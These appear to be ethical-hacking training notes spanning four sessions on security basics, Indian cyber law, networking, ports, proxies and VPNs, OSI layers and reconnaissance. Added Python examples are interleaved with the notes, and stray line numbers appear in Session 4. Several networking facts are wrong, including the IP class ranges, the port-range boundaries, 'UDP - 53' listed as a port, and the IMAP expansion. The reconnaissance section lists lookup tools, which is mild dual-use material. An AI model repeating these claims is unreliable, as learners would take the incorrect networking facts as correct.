Sep 01, 2019, 10:04 AM
=======
GRADE 1
=======



SESSION 1
=========

INFORMATION SECURITY
=====================

DATA | INFORMATION

Data : Raw Facts
Information : Collection of Data.

Information Security : Covers all the security aspects related to Information Technology.
-----------------------------------------------------------------------------------------------------------------------------------

CIA TRIAD
==========

1. CONFIDENTIALITY - Data which is confidential and private should be secured from bad people. eg. - Aadhar Cards, Financial Records etc.

2. INTEGRITY - Data should be secured from manipulation by others - accuracy. eg. changing of any sensitive personal document.

3. AVAILABILITY - Availability simply means that data should be available to the specific persons who have access rights.


-----------------------------------------------------------------------------------------------------------------------------------

ETHICAL HACKING / CYBER SECURITY
=================================

Ethical - Means legal practices which should be performed.

Hacking - Hacking means accessing any data, information or any system with or without the permission of the individual.

Hackers - Hackers are the most skilled and technical people who are proficient in understanding the technical aspects.

------------------------------------------------------------------------------------------------------------------------------------

TYPES OF HACKERS
=================

1. BLACK HAT HACKERS - These are the bad people who access and gain the resources of any individual for the sake of their own wealth. Eg. Shadow Brokers

2. WHITE HAT HACKERS - These are those people who gain access and tamper with the resource for the sake of the individual. Eg. Rahul Tyagi, Abhijeet Singh, Sanjeev Multani etc.

3. GREY HAT HACKERS - These are those hackers who hack and gain resources for the sake of the society and culture.
Eg. Anonymous, Edward Snowden etc.

------------------------------------------------------------------------------------------------------------------------------------

Other Categories
================

1. Script Kiddies - These are those people who steal the programs, ideas or any other method of hacking and perform hacks without any knowledge.

2. Noobz - These are the new-born technical babies who have just arrived in the field of cyber security.

3. Crackers - These are those people who are good at cracking into a particular machine or an authentication check.

------------------------------------------------------------------------------------------------------------------------------------

IMPACTS OF BLACK HAT HACKING
============================
= Loss of respect, finance and other aspects.
= Identity Theft
= Leakage of Personal Resources etc.

------------------------------------------------------------------------------------------------------------------------------------

TYPES OF INFORMATION
====================

1. Confidential Information - Aadhar Cards, Passwords, Birth Certificates, PAN Cards etc.
2. Financial Information - Financial Statements, Bank Details, Login Credentials for banking practices etc.
3. Health Information - Policies, Diseases etc.
4. Personal Information - Address, Phone Numbers, DOBs etc.

------------------------------------------------------------------------------------------------------------------------------------

CYBER LAWS
===========

For the Cyber Security Domain, there are acts which are called IT Acts. These acts are for preventing any malicious person or black hat hacker from gaining access to any system.

The first act which was launched and appreciated was the IT ACT 2000, which had very few provisions for the cyber crimes which are being reported under the constitution.


After that a new act was launched, the IT AMENDMENT ACT 2008.


- Section 43 / 43 A - Losses and damages which a person bears due to harm to any computer.
Imprisonment - 1 year and fine of 2,00,000, or both

- Section 65 - It covers the losses and damage of tampering with and misusing any source code.
Imprisonment upto 3 years and Fine upto 200,000 INR, or both

- Section 66 - Covers all the Hacking Activities. Hacking a computer system dishonestly or fraudulently.
 Imprisonment upto 3 years and Fine upto 500,000 INR.
 - Section 66 A - If a person illegally hacks and gains access into a machine he/she will be arrested. Imprisonment upto 3 years and Fine upto 100,000 INR or both.
 - Section 66 C - Identity Theft Crimes done by any individual. Imprisonment upto 3 years and Fine upto 100,000 INR or both.
 - Section 66 F - Covers all the activities which come under Cyber Terrorism.
 Life Imprisonment, Fine of 10 Lac INR.

- Section 67 - Covers all the activities of providing and publishing obscene material and adult material in a public domain.
First conviction with imprisonment of three years and with fine of 5,00,000 INR, or both.

- Section 70 - Covers all the activities of misleading and gaining access into Government Restricted Areas or Private Protected Access.
Imprisonment of Ten Years and can also be liable to fine, or both.

- Section 71 - It covers all the Misrepresentation of facts that comes along with Identity, Data and other factors.
Imprisonment for this is 2 Years, with fine of 1 LAC INR, or both.

- Section 72 - Breaches of the CIA Triad of electronic records.
Imprisonment for Ten Years, or with fine, or with both.

- Section 73 - Covers all the practices which come along with Misleading Digital Certificates and Signatures.
Imprisonment for upto two years, or with fine upto 1,00,000 INR, or with both.

--------------------------------------------------------------------------------------------------------------------------

Basic Guide to IT Amendment Act 2008 - https://lucideustech.blogspot.in/2018/02/a-basic-guide-to-indian-it-amendment.html


NATGRID and CERT-In are the two main Control Authorities to take action.


----------------------------------------------------------------------------------------------------------------------


TASK
====
1. Movies - The Fifth Estate, Snowden
2. Read on Vault 7.
3. How does a Search Engine Work?


WEBSITES TO FOLLOW : thehackernews.com , lucideustech.blogspot.in



 SESSION 2
 =========

NETWORK TERMINOLOGIES - I
=========================

1. Physical Network
2. Virtual Network


Social Network: The network where people gather with each other to communicate and share their resources with each other.


NETWORK - A network is a place where two or more peripherals or machines interact with each other while sharing their resources.


TYPES OF NETWORK
==================
1. PAN - Personal Area Network - eg. Bluetooth etc.
2. LAN - Local Area Network - eg. Organizations, Schools etc.
3. MAN - Metropolitan Area Network - eg. - Cyber City, Cyber Hub etc.
4. WAN - Wide Area Network - eg. satellites


NETWORK TOPOLOGIES
====================

Topology means the architecture of the network.

There are 5 Network Topologies

1. Star Topology - All machines are connected through the use of a central connecting device like a router, hub, or switch.

2. Ring Topology - All machines are connected in a closed chain or circular shape, sharing their resources unidirectionally or bidirectionally.

3. Bus Topology - In this, all machines are connected along a single line (the bus). eg. Small Corporate Networks

4. Mesh Topology - The messy form of network interconnection.

5. Hybrid Topology - 2 or more topologies are connected with each other.

Due to the disadvantages of these Topologies, Wireless Networks (WiFi) came into existence.


PROTOCOLS
===========

They are the rules and regulations OR guidelines for communication in a Particular network.
For example, if two persons are playing table tennis, then both need to play by the same rules. None of them should go out of the rules. Likewise, if two devices need to communicate, they need to follow some basic rules. So for that, protocols are used.

EG. Protocols in a school -

Cleanliness, Polished Shoes, Cut Nails, Ironed Shirt, School Uniform, Proper Dress.

Well known Protocol examples -
==========================

IP - Internet Protocol
TCP - Transmission Control Protocol - Sequential
UDP - User Datagram Protocol
HTTP - HyperText Transfer Protocol
HTTPS - HTTP over SSL
ICMP - Internet Control Messaging Protocol
DHCP - Dynamic Host Configuration Protocol
SMTP - Simple Mail Transfer Protocol
IMAP - Internet Messaging Application Protocol
POP3 - Post Office Protocol v3
FTP - File Transfer Protocol



INTERNET / INTRANET
====================
INTERNET is an "inter-connection" of networks which are connected to each other. All the people use their networks by sharing the resources of it with each other.

INTRANET is a network which is a standalone network and not connected to any other network.

ISP - INTERNET SERVICE PROVIDER - IDEA, JIO ETC.

TYPES OF ADDRESSES IN A PARTICULAR NETWORK
===========================================
1. Logical Address / Virtual Address - These addresses are given to us by the router or ISP; they can be changed and are unique within every network. - IP Address

2. Physical Address - These addresses are those which are given to us by the manufacturer of your machine through its Network Interface Card. - MAC - Media Access Control



IP ADDRESSES
==============

An IP Address is a virtual address, which is unique in a particular network. It is necessary for devices to communicate with the other devices.

VERSIONS OF IP ADDRESSES
=======================

1. IPV4 - 32 BIT ADDRESS - These are the Numerical IP Addresses which are written in decimal and divided into octets separated by a period. In a Particular Network, there can be 2^32 IP Addresses.

EG. - 192.168.0.54
      X.X.X.X

DEFINED IN BINARY VALUES - 0 & 1

192 = 11000000
168 = 10101000


       128  64  32  16   8   4   2   1
 192=    1   1   0   0   0   0   0   0
 168=    1   0   1   0   1   0   0   0




2. IPV6 - 128 BIT ADDRESS - these addresses are defined in the form of hexadecimal values.

eg. fe80::ab35:75cd:7ac3

HEXADECIMAL - 0-9, A-F

0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F
(A to F stand for the values 10 to 15)

2^128 addresses - IPV6 is the solution to the shortage of IPV4 addresses

Additions over IPV4
= Encryption
= Tunneling

The IP ADDRESS which is not connected to any network is called the Loop Back Address/Localhost, and that address is "127.0.0.1".
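The place-value table above converts one octet by hand. The following Python code is an added example written for this edit, not part of the original notes: it does the same conversion, packs the four octets into the single 32-bit number behind the 2^32 figure, and expands the `::` shorthand of the IPv6 example above into its eight hexadecimal groups (each hex digit is exactly four bits, so eight 16-bit groups give 128 bits). The addresses used are the ones from the notes.

```python
# Added example (not part of the original notes): IPv4 octets to binary by
# place value, the four octets packed into one 32-bit number, and IPv6 "::"
# shorthand expanded into eight 4-digit hexadecimal groups.

PLACE_VALUES = (128, 64, 32, 16, 8, 4, 2, 1)   # the column headers of the table above


def octet_to_bits(octet: int) -> str:
    """One IPv4 octet (0-255) -> its 8-bit string, by subtracting place values."""
    if not 0 <= octet <= 255:
        raise ValueError(f"octet out of range: {octet}")
    bits = []
    remainder = octet
    for place in PLACE_VALUES:
        if remainder >= place:
            bits.append("1")
            remainder -= place
        else:
            bits.append("0")
    return "".join(bits)


def ipv4_to_binary(address: str) -> str:
    """'192.168.0.54' -> '11000000.10101000.00000000.00110110'."""
    parts = address.split(".")
    if len(parts) != 4:
        raise ValueError(f"IPv4 address needs four octets: {address}")
    return ".".join(octet_to_bits(int(part)) for part in parts)


def ipv4_to_int(address: str) -> int:
    """Pack the four octets into one 32-bit integer: 4 octets x 8 bits = 32 bits,
    which is why IPv4 has 2**32 possible addresses."""
    value = 0
    for part in address.split("."):
        octet = int(part)
        if not 0 <= octet <= 255:
            raise ValueError(f"octet out of range: {octet}")
        value = (value << 8) | octet
    return value


def expand_ipv6(address: str) -> str:
    """Expand '::' (a run of all-zero groups) into the full eight 4-digit groups.
    'fe80::ab35:75cd:7ac3' -> 'fe80:0000:0000:0000:0000:ab35:75cd:7ac3'"""
    if address.count("::") > 1:
        raise ValueError("'::' may appear only once")
    if "::" in address:
        head, tail = address.split("::")
        head_groups = head.split(":") if head else []
        tail_groups = tail.split(":") if tail else []
        missing = 8 - len(head_groups) - len(tail_groups)
        if missing < 1:
            raise ValueError("'::' must stand for at least one group")
        groups = head_groups + ["0"] * missing + tail_groups
    else:
        groups = address.split(":")
    if len(groups) != 8:
        raise ValueError(f"IPv6 address needs eight groups: {address}")
    return ":".join(group.lower().zfill(4) for group in groups)


def ipv6_group_to_bits(group: str) -> str:
    """One hexadecimal group -> 16 bits; each hex digit (0-9, A-F) is 4 bits,
    so 8 groups x 16 bits = 128 bits and 2**128 addresses."""
    return "".join(format(int(digit, 16), "04b") for digit in group.zfill(4))


if __name__ == "__main__":
    print(ipv4_to_binary("192.168.0.54"))
    print(ipv4_to_int("192.168.0.54"))
    print(expand_ipv6("fe80::ab35:75cd:7ac3"))
    print(ipv6_group_to_bits("fe80"))
```

`expand_ipv6` rejects a second `::` and an address with the wrong number of groups, which is the kind of input check a parser needs before an address is used in a rule or a log.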


TYPES OF IP ADDRESSES
======================

1. Private IP Addresses - These IP Addresses are those which are given to our machine by the router. for eg. - 192.168.0.54

2. Public IP Addresses - These IP Addresses are those which are given to the router by the ISP.

Where to find them?
Private IP Address - Windows - CMD - "ipconfig" - IP configuration (ipconfig /all)
                     UNIX/LINUX - CMD - "ifconfig" - Interface Configuration

PUBLIC IP Address - Google - my ip address,
                    http://ipcow.com/
                    ipchicken.com


User Information
=============

125.63.71.34
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Hostname = 125.63.71.34.reverse.spectranet.in
Device = X11
Operating System = Ubuntu
Browser Name = Firefox
Browser Version = 58.0
Is Mobile Device = False
Is Beta = False
Is Crawler = False
Screen Resolution = 1024 x 768
Window Size = 1024 x 741



IP CLASSES
===========

CLASS A - 127.0.0.1 - 128.255.255.255 - ORGANIZATIONS
CLASS B - 128.255.255.255 - 191.255.255.255 - ORGANIZATIONS
CLASS C - 192.255.255.255 - 223.255.255.255 - PRIVATE LOCAL
CLASS D - 224.255.255.255 - 239.255.255.255 - OTHER
CLASS E - 240.255.255.255 - 254.255.255.255 - OTHER


ROUTER - GATEWAY. The Private IP Address of a Gateway or a Router is 192.168.0.1 / 192.168.1.1 in most of the cases.


IP CATEGORIZATION ON THE BASIS OF ASSIGNING
============================================

1. Dynamic IP Address - Randomly Generated IP Address assigned by the Router.
2. Static IP Address - These IP Addresses are defined by you in the network configuration according to the network.

Static IP Addresses get priority as compared to Dynamic IP Addresses.

SUBNET OR SUBNETTING
=====================
A Subnet is a subpart of a network.

SUBNETTING = Dividing a particular network into different sub parts.

Syntax - 192.168.0.1/24 - This depicts all the IP Addresses in a particular Subnet.

For eg. = 192.168.0.1 - 192.168.0.255
More people will come ?? - SUBNETTING
Solution - 192.168.1.1 - 192.168.1.255
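The /24 notation, the IP CLASSES table and the private/public split above can all be checked with Python's standard `ipaddress` module. The code below is an added example for this edit, not from the original notes. It uses the first-octet boundaries of the classful scheme (0-127 A, 128-191 B, 192-223 C, 224-239 D, 240-255 E) and the standard private (RFC 1918) and loopback (127.0.0.0/8) ranges, so it also serves as a cross-check of the ranges written in the table; the addresses fed to it are the ones from the notes plus 8.8.8.8 as a public example.

```python
# Added example (not part of the original notes): classful range, private/
# public/loopback status and subnet ranges with the standard library's
# ipaddress module.
import ipaddress


def ipv4_class(address: str) -> str:
    """Classful (RFC 791) class from the first octet:
    A = 0-127, B = 128-191, C = 192-223, D = 224-239 (multicast), E = 240-255."""
    first_octet = int(ipaddress.IPv4Address(address)) >> 24
    if first_octet < 128:
        return "A"
    if first_octet < 192:
        return "B"
    if first_octet < 224:
        return "C"
    if first_octet < 240:
        return "D"
    return "E"


def address_kind(address: str) -> str:
    """'loopback' (127.0.0.0/8), 'private' (RFC 1918 ranges such as 192.168.0.0/16)
    or 'public'. Loopback is tested first because it also counts as private."""
    ip = ipaddress.ip_address(address)
    if ip.is_loopback:
        return "loopback"
    if ip.is_private:
        return "private"
    return "public"


def subnet_summary(cidr: str) -> dict:
    """Everything the /24 notation stands for: network, broadcast, netmask and
    the usable host range. strict=False lets '192.168.0.1/24' mean the block
    that contains that host."""
    net = ipaddress.ip_network(cidr, strict=False)
    hosts = list(net.hosts())
    return {
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "netmask": str(net.netmask),
        "first_host": str(hosts[0]),
        "last_host": str(hosts[-1]),
        "usable_hosts": len(hosts),
    }


def split_subnet(cidr: str, new_prefix: int) -> list:
    """Subnetting: divide one block into smaller blocks with a longer prefix."""
    net = ipaddress.ip_network(cidr, strict=False)
    return [str(subnet) for subnet in net.subnets(new_prefix=new_prefix)]


if __name__ == "__main__":
    for addr in ("192.168.0.54", "127.0.0.1", "8.8.8.8"):
        print(addr, ipv4_class(addr), address_kind(addr))
    print(subnet_summary("192.168.0.1/24"))
    print(split_subnet("192.168.0.0/23", 24))
```

`subnet_summary` shows why the usable range of a /24 is .1 to .254 and not .1 to .255: .0 is the network address and .255 the broadcast address, and `ip_network(..., strict=False)` is what turns a host address with a prefix into the block it belongs to.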

ALL THESE IPs ARE PROVIDED TO EVERYONE ALL OVER THE GLOBE BY AN ORGANIZATION NAMED "IANA" - Internet Assigned Numbers Authority, which allocates global IPs to everyone.


NAT - Network Address Translation
==================================

This is a function which converts my Public IP Address to my Private IP Address and vice versa. -> NAT (VMware)
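The conversion is done per connection, not once for the whole machine: the router keeps a table that maps each private (address, port) pair to a port on its single public address, and uses the same table in reverse for replies. The simplified NAT table below is an added example written for this edit, not from the notes; the public address 203.0.113.7, the remote server 198.51.100.10 and the port numbers are constructed values from the documentation address ranges.

```python
# Added example (not part of the original notes): a simplified NAT/PAT table.
# One public address is shared: each outbound connection gets its own public
# port, and replies are mapped back to the private host that opened it.
# Addresses are constructed examples from the documentation ranges.

PUBLIC_IP = "203.0.113.7"        # constructed: the router's ISP-assigned public address


class NatTable:
    def __init__(self, public_ip: str, first_port: int = 40000):
        self.public_ip = public_ip
        self.next_port = first_port
        # (private_ip, private_port, dst_ip, dst_port) -> public_port
        self.outbound = {}
        # (public_port, remote_ip, remote_port) -> (private_ip, private_port)
        self.inbound = {}

    def translate_outbound(self, src_ip, src_port, dst_ip, dst_port):
        """Packet leaving the LAN: rewrite private source -> (public_ip, public_port)."""
        key = (src_ip, src_port, dst_ip, dst_port)
        if key not in self.outbound:
            public_port = self.next_port      # allocate a fresh public port
            self.next_port += 1
            self.outbound[key] = public_port
            self.inbound[(public_port, dst_ip, dst_port)] = (src_ip, src_port)
        return (self.public_ip, self.outbound[key], dst_ip, dst_port)

    def translate_inbound(self, remote_ip, remote_port, public_port):
        """Packet arriving from the internet: look up the private host that opened
        this connection. Returns None (packet dropped) when no host did, which is
        why unsolicited inbound traffic does not reach LAN machines behind NAT."""
        return self.inbound.get((public_port, remote_ip, remote_port))


if __name__ == "__main__":
    nat = NatTable(PUBLIC_IP)
    print(nat.translate_outbound("192.168.0.54", 51000, "198.51.100.10", 443))
    print(nat.translate_outbound("192.168.0.55", 51000, "198.51.100.10", 443))
    print(nat.translate_inbound("198.51.100.10", 443, 40000))
    print(nat.translate_inbound("198.51.100.10", 443, 40002))
```

Two private hosts using the same source port get different public ports, so the reply for each can be routed back correctly; a packet arriving for a public port that no inside host opened has no table entry and is dropped, which is the incidental filtering effect of NAT (not a substitute for a firewall, since any inside host can create an entry).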


DHCP AND DHCP SERVER
=====================
DHCP is the Dynamic Host Configuration Protocol which assigns a dynamic IP to our machine randomly with the help of a SERVER aka DHCP Server. It is situated inside the router.

DHCP POOL - Consists of all the Network IPs from which a Dynamic IP is assigned to Our Machine.

IP Lease Time - the Alive time of the IP Address.
Mobile: DHCP Configuration
Router: DHCP


TASK
====

- What happened to IPV5?
- Static IP Addresses - Win 7 VM
- How Does Torrent work?

https://lucideustech.blogspot.in/
https://thehackernews.com/



 SESSION 3
 =========

NETWORK TERMINOLOGIES II
========================

PORTS
======

A port is an endpoint of communication in an operating system. In a computer networking system a computer or a program connects to and runs services on the Internet via a port. They are the gateways through which we access any service of any system.

There are 2 Types of Ports Basically -

1. Hardware or Physical Ports - The ports which help to connect the hardware components to our computer. These are the ports which are tangible and we can see and use them on a particular system. For eg. USB Port, HDMI, VGA Port.

2. Virtual or Logical Ports - These are those ports which are not tangible and are used to run a service in a Computer Networking System. For every service or protocol there is a unique port number assigned to it which helps in processing it. So these are the ports which are virtually located in a system or a machine to access some services of the system but are not visible.

There are a total of 65,535 Ports in a particular system.

Categories of Virtual and Logical Ports
=========================================

1. Well Known and Pre-defined Ports - These are those which are used for all the well known Services which are used all over the globe.
EG. FTP - 21
    HTTP - 80
    HTTPS - 443
    SMTP - 25
    POP3 - 110
    UDP - 53
    SSH - 22
    TELNET - 23

Range - 0 - 1023


2. Registered Ports - These ports are those which are basically used by software organizations to run their services.
Eg. MYSQL - 3306
    ITUNES - 1609
    MS-RDP - 3389
    ORACLE - MYSQL - 3306
    DARK COMET - 1604
    Team Viewer - 1609

3. Dynamic or Standalone Ports - These ports are those which are used by anyone for their personal purposes.
For eg . 48,897

Range Of Ports
===============

Well Known Ports - 0-1023
Registered Ports - 1024 - 41,951
Dynamic Ports - 41,952-65,535
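A defender meets these port categories when reviewing what a machine is listening on. The Python below is an added example written for this edit, not part of the notes: it parses constructed `netstat`-style output (the sample text is made up, not captured from a real host), sorts each listening port into its range, maps it to the service expected on that number, and flags ports bound to every interface that match no expected service. The range boundaries it uses are the ones the IANA registry defines (0-1023 well-known, 1024-49151 registered, 49152-65535 dynamic), so it also serves as a check of the figures in the Range Of Ports list.

```python
# Added example (not part of the original notes): classify listening ports
# from netstat-style output and flag exposed ports with no expected service.
# The sample output below is constructed, not captured from a real host.
import re

WELL_KNOWN_MAX = 1023       # IANA: system/well-known ports 0-1023
REGISTERED_MAX = 49151      # IANA: registered 1024-49151, dynamic 49152-65535

# services from the notes with their standard port numbers
EXPECTED_SERVICE = {
    21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 53: "dns", 80: "http",
    110: "pop3", 443: "https", 3306: "mysql", 3389: "ms-rdp",
}

SAMPLE_NETSTAT = """\
Proto  Local Address          Foreign Address        State
tcp    0.0.0.0:22             0.0.0.0:*              LISTEN
tcp    127.0.0.1:3306         0.0.0.0:*              LISTEN
tcp    0.0.0.0:443            0.0.0.0:*              LISTEN
tcp    0.0.0.0:8085           0.0.0.0:*              LISTEN
tcp    192.168.0.54:51234     198.51.100.10:443      ESTABLISHED
"""

LINE_RE = re.compile(r"^(tcp|udp)6?\s+(\S+):(\d+)\s+(\S+)\s+(\S+)")


def port_category(port: int) -> str:
    if not 0 <= port <= 65535:
        raise ValueError(f"port out of range: {port}")
    if port <= WELL_KNOWN_MAX:
        return "well-known"
    if port <= REGISTERED_MAX:
        return "registered"
    return "dynamic"


def listening_ports(netstat_text: str) -> list:
    """Parse LISTEN lines into dicts with category, expected service and exposure."""
    entries = []
    for line in netstat_text.splitlines():
        match = LINE_RE.match(line)
        if not match or match.group(5) != "LISTEN":
            continue
        bind_addr, port = match.group(2), int(match.group(3))
        entries.append({
            "proto": match.group(1),
            "bind": bind_addr,
            "port": port,
            "category": port_category(port),
            "service": EXPECTED_SERVICE.get(port, "unknown"),
            # bound to every interface, i.e. reachable from the network
            "exposed": bind_addr in ("0.0.0.0", "::", "*"),
        })
    return entries


def review_findings(netstat_text: str) -> list:
    """Defender's view: which exposed ports need an explanation?"""
    findings = []
    for entry in listening_ports(netstat_text):
        if entry["exposed"] and entry["service"] == "unknown":
            findings.append(
                f"port {entry['port']} ({entry['category']}) listens on all "
                f"interfaces but matches no expected service")
        if entry["exposed"] and entry["service"] == "telnet":
            findings.append("telnet (23) is exposed; it sends credentials in clear text")
    return findings


if __name__ == "__main__":
    for entry in listening_ports(SAMPLE_NETSTAT):
        print(entry)
    print(review_findings(SAMPLE_NETSTAT))
```

The MySQL port in the sample is bound to 127.0.0.1 only, so it is not reported: the bind address matters as much as the port number when judging exposure.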

-------------------------------------------------------------------------

DNS
====

THE COMPUTER ONLY UNDERSTANDS THE LANGUAGE OF NUMBERS.
CHROME - "WWW.FACEBOOK.COM"
Language - Binaries - 0&1

Domain Name System is a Technology which converts a Domain Name into an IP Address or a Number and Vice Versa.
Because it is difficult for a layman to learn an IP Address for a website. for eg. learning "247.116.25.195" for "www.google.com".

"Ping" - "ping www.google.com"

"Tracert" - Trace the Route to the destination with hops.

https://www.youtube.com/watch?v=2ZUxoi7YNgs

-------------------------------------------------------------------------

PROXIES AND VPN
=================

PROXY / PROXY SERVERS
======================
Proxies are the Dummy Servers which help us by allocating an IP Address of their own to us on a temporary basis.
It acts as a middle man between the DNS server and the client accessing it.
They allocate an IP Address of any location, and give us the permission to access a web service which is blocked.

To find out the location of a Global IP - "ip2location.com"

Proxies are of 3 Types
========================

1. Web Based Proxy or Proxy Servers - These are the Websites which act as a Proxy Server and act as an intermediary between client and server.
For eg. - kproxy.com
          ninja proxy etc.

2. Web Extension Based Proxy - These are the Proxy Server Client Agents which are enabled in our browser and behave like a proxy dummy server.

For eg. Anonymox, Hola Proxy Extension etc.

----------------------------------------------------------------------

VPN - VIRTUAL PRIVATE NETWORK
==============================
A Virtual Private Network is a more advanced technology which allows authorized clients to access a Virtually Created Network which is safe and sets the anonymity of a person. They are more advanced than proxies and are basically a new virtual network created by organizations or anyone for their personal usage.

They can only be accessed by authorized people, usually in corporates for accessing their confidential resources.

More Functionalities than Proxies:
= Tunneling of data - So that there is a secret passage which will not be known to anyone.
= Encryption of Data - It encrypts or makes the data unreadable.
= It gives you better networking functionalities.
= Authorization and Authentication - Only authorized people can access it.

Eg. PROXPN, VPNBOOK.COM , free of cost
------------------------------------------------------------------------

Standardisation Followed for communication in a Particular Network

OSI REFERENCE MODEL
====================

1. Physical Layer - Wired / Wireless, Bitwise conversion of data
2. Data Link Layer - MAC Addressing
3. Network Layer - Logical Addressing and IP Fragmentation
4. Transport Layer - Defines the Port Addressing and Routing Architecture
5. Session Layer - Existence of a particular Session created by the Application.
6. Presentation Layer - Bit Conversion and Fragmentation of data packets
7. Application Layer - UI of any application - Whatsapp etc.

or

Physical Layer - Way of transmitting the data - peripherals
Data Link Layer - Identifies the Hardware Address - MAC Address, Fragmentation and De-fragmentation of data
Network Layer - Logical Address - IP Address, Topologies, TCP/UDP
Transport Layer - Routing Mechanism, Port Addressing
Session Layer - TimeStamp of transmitting the data, QOS
Presentation Layer - Works on Segmentation as well as Window Framing
Application Layer - User Interface of the Application


Not Feasible
------------------------------------------------------------------------

TCP/IP MODEL
=============

1. Physical Layer / Network Interface = Physical + Data Link Layer
2. Network Layer / Internet Layer
3. Transport Layer
4. Application Layer = Session + Presentation + Application Layer
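The lower three layers of either model become concrete when you build one packet by hand: the transport layer adds ports, the network layer adds IP addresses, and the data link layer adds MAC addresses, each wrapping the one above. The code below is an added example for this edit, not from the notes: it builds a UDP datagram inside an IPv4 packet inside an Ethernet frame with `struct`, then peels the headers off again and verifies the IP header checksum. The MAC addresses, IP addresses, ports and payload are constructed values.

```python
# Added example (not part of the original notes): one UDP datagram wrapped in an
# IPv4 packet wrapped in an Ethernet frame, built and parsed with struct, to
# show the header each layer adds. MACs, IPs and payload are constructed.
import struct


def mac_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(part) for part in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def ip_checksum(header: bytes) -> int:
    """RFC 1071 ones'-complement sum over 16-bit words. Over a header that already
    carries a correct checksum the result is 0, which is how receivers verify it."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def udp_segment(src_port: int, dst_port: int, payload: bytes) -> bytes:
    """Transport layer: port addressing. Checksum 0 = not computed (legal for UDP over IPv4)."""
    return struct.pack("!HHHH", src_port, dst_port, 8 + len(payload), 0) + payload


def ipv4_packet(src_ip: str, dst_ip: str, payload: bytes, ttl: int = 64, proto: int = 17) -> bytes:
    """Network layer: logical (IP) addressing. proto 17 = UDP."""
    header = struct.pack("!BBHHHBBH4s4s",
                         0x45,              # version 4, header length 5 words (20 bytes)
                         0,                 # DSCP/ECN
                         20 + len(payload), # total length
                         0x1234,            # identification (constructed)
                         0x4000,            # flags: don't fragment; fragment offset 0
                         ttl, proto,
                         0,                 # checksum placeholder, filled in below
                         ip_bytes(src_ip), ip_bytes(dst_ip))
    checksum = ip_checksum(header)
    return header[:10] + struct.pack("!H", checksum) + header[12:] + payload


def ethernet_frame(src_mac: str, dst_mac: str, payload: bytes, ethertype: int = 0x0800) -> bytes:
    """Data link layer: hardware (MAC) addressing. EtherType 0x0800 = IPv4."""
    return mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ethertype) + payload


def build_frame(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, payload: bytes) -> bytes:
    """Application data -> UDP -> IPv4 -> Ethernet: each layer prepends its header."""
    return ethernet_frame(src_mac, dst_mac,
                          ipv4_packet(src_ip, dst_ip, udp_segment(src_port, dst_port, payload)))


def parse_frame(frame: bytes) -> dict:
    """Peel the headers off again, layer by layer, verifying the IP checksum."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                 # header length in bytes
    udp = ip[ihl:]
    src_port, dst_port, udp_len, _ = struct.unpack("!HHHH", udp[:8])
    return {
        "dst_mac": mac_str(frame[0:6]), "src_mac": mac_str(frame[6:12]), "ethertype": ethertype,
        "src_ip": ip_str(ip[12:16]), "dst_ip": ip_str(ip[16:20]), "ttl": ip[8], "proto": ip[9],
        "checksum_ok": ip_checksum(ip[:ihl]) == 0,
        "src_port": src_port, "dst_port": dst_port,
        "payload": udp[8:udp_len],
    }


if __name__ == "__main__":
    frame = build_frame("00:11:22:33:44:55", "66:77:88:99:aa:bb",
                        "192.168.0.54", "192.168.0.1", 51234, 53, b"hello")
    print(len(frame), "bytes on the wire")
    print(parse_frame(frame))
```

Five bytes of application data become 47 bytes on the wire (14 Ethernet + 20 IPv4 + 8 UDP + 5), and flipping any header byte, such as the TTL, makes `checksum_ok` false, which is what a router does before it trusts the addresses in the header.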

------------------------------------------------------------------------

WEB TECHNOLOGY BASICS
======================

1. Web Hosting Space - ICANN - GoDaddy, Bigrock etc.
2. Domain Name - .com/.in/.net
3. Database - Where all the data gets stored in a server
4. Server Type - Windows based servers, Linux Servers
5. Client and Server Architecture
6. Web Technologies - HTML, PHP, JSP, ASP etc.

------------------------------------------------------------------------

TASK
=====

1. How does a Search Engine Work? Spiders? Crawlers?
2. https://www.google.co.in - parts:
   https  |  ://  |  www  |  .  |  google  |  .  |  co  |  .  |  in
3. Create a Table of 10 Well Known Ports and Registered Ports.
4. Comparison between OSI and TCP/IP Model.



565
566 SESSION 4
567 =========
568
569PHASES OF HACKING
570==================
571
572There are particular 5 Phases which depicts how to gain access to a particular system. these are
573
5741. INFORMATION GATHERING (Reconaissance)
5752. SCANNING (OS, IP, MAC etc)
5763. GAINING ACCESS
5774. MAINTAINING ACCESSS
5785. COVERING TRACES
579
580Information Gathering + SCanning = Pre Attacking Phase
581Gaining Access = Attacking or Exploitation Phase
582Maintaining Access + Covering Traces = Post Exploitation Phase
583
584INFORMATION GATHERING OR RECONNAISSANCE
585=======================================
586
587Information Gathering is an act where we gather and extract as much information as we can about our victim. The Victim can be a Network, a Machine, A website or a individual. The Information we gather in the Reconnaissance Phase will helps us that which approach to follow for attacking into the Target whether it is a Network, a Web Application or a Individual.
588Maximum we know about the Target, Maximum will be the chances of Successful Exploitation.
589
590Need and Motive of Information Gathering
591=========================================
592
593We gather information about the victim so that we plan our attack according to the Information gathering report.
594
595TYPES OF INFORMATION GATHERING
596===============================
597
5981. WEB BASED INFORMATION GATHERING : It tells us about the services and the identity of the website and its owner related to other details. The information can be about the services of the Website it is using, what are the directories a Web Application is having, Server type whether it is using a Shared Server or a Dedicated Server etc.
599
600
Useful Tools -

 https://whois.icann.org/en , https://whois.domaintools.com/, https://mxtoolbox.com/

Whether the website is using a dedicated server or a shared server.

Dedicated Servers are only for the websites of a particular owner.
Shared Servers are those which are shared by multiple websites.
Eg. of Shared and Dedicated - Shared PG Rooms, Dedicated Own Bungalow.

Tool - www.yougetsignal.com

- Robots.txt

